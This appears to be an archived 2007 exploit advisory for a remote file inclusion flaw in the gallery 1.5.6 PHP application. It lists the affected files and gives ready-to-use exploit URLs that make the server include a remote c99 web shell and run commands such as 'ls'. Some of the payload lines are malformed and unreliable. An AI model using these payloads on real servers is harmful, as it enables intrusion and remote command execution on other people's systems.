AOH :: HP Unsorted G :: TB10590.HTM

gallery >> 1.5.6 Remote File Inclusion



gallery >> 1.5.6 Remote File Inclusion
gallery >> 1.5.6 Remote File Inclusion



######################################################################################################################################
#gallery >> 1.5.6 Remote File Inclusion                                                                                              #
#Affected Software : gallery >> 1.5.6                                                                                                #
#Download..: http://sourceforge.net/project/downloading.php?group_id=7130&use_mirror=heanet&filename=gallery-1.5.6.tar.gz&66134343 # 
#Risk ..............: high                                                                                                           #
#Date .........: 24/4/2007                                                                                                           #
#Found by ..........: s433d_only_linux (Dr.Linux)                                                                                    #
#Contact ...........: s433d_only_linux@yahoo.de # 
#Web .............: Www.hackerz.ir # 
######################################################################################################################################
#Affected File:                                                       
gallery/lib/content.php 
gallery/lib/content.php 
gallery/lib/content.php 
gallery/lib/content.php 
gallery/setup/frame_test.php 
gallery/contrib/joomla/admin.gallery.php 
gallery/contrib/joomla/toolbar.gallery.php 
gallery/contrib/mambo/admin.gallery.php 
gallery/contrib/mambo/toolbar.gallery.php 
gallery/contrib/phpBB2/modules.php 
gallery/contrib/phpBB2/modules.php 
gallery/contrib/phpBB2/modules.php 
gallery/contrib/phpnuke/modules.php.
gallery/contrib/phpnuke/modules.php.patch 
########################################################################################################################################
# Exploit:
http://[target]/gallery/lib/content.php?include=http://shellseit/c99.txt?cmd=ls 
gallery/lib/content.php?=http://shell/c99.txt?cmd=ls 
gallery/lib/content.php?require=http://shell/c99.txt?cmd=ls 
gallery/lib/content.php?=http://shell/c99.txt?cmd=ls 
gallery/contrib/mambo/admin.gallery.php?require_once=http://shell/c99.txt?cmd=ls 
gallery/contrib/mambo/toolbar.gallery.php?require_once=http://shell/c99.txt?cmd=ls 
#
#
#######################################################################################################################################

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.